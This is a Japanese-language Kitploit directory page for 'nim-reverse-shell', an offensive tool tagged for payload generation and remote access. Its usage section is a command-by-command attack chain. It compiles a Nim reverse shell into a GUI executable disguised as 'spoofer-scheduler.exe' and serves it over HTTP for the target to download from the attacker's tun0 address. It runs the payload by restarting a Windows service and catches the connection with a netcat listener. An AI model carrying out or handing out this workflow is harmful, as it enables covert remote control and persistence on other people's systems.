Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nim-reverse-shell — nim-reverse-shell | Kitploit
ツール/GitHubGitHub/h3x0v3rl0rd/nim-reverse-shell
ペイロード生成ポストエクスプロイトペネトレーションテストレッドチーミングリモートアクセスツール
GitHubh3x0v3rl0rd/nim-reverse-shell

nim-reverse-shell

nim-reverse-shell

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

nim-reverse-shell

nim-reverse-shell

例:

root@kitploit:~
sudo apt install nim

それに応じてスクリプトを更新してください

image

root@kitploit:~
nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe reverse.nim

image

root@kitploit:~
python3 -m http.server 8888
root@kitploit:~
wget http://tun0:8888/spoofer-scheduler.exe -o spoofer-scheduler.exe

image

root@kitploit:~
sc.exe stop spoofer-scheduler
sc.exe start spoofer-scheduler

image

root@kitploit:~
nc -nlvp 8080

image

ツールをダウンロード